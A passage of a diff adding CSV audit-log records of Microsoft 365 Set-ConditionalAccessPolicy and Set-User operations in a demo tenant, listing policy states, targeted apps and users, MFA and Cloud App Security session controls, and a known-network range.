+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:54 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:54 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:51 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:54 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T03:13:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/15/2020 3:13:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-15T20:35:22Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\af457e33-8dc4-47c3-817c-31b462d6f91f""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-16T02:49:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:03 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:03Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:03 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:03Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:03 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-16T02:49:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:03Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:03 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T02:49:03Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
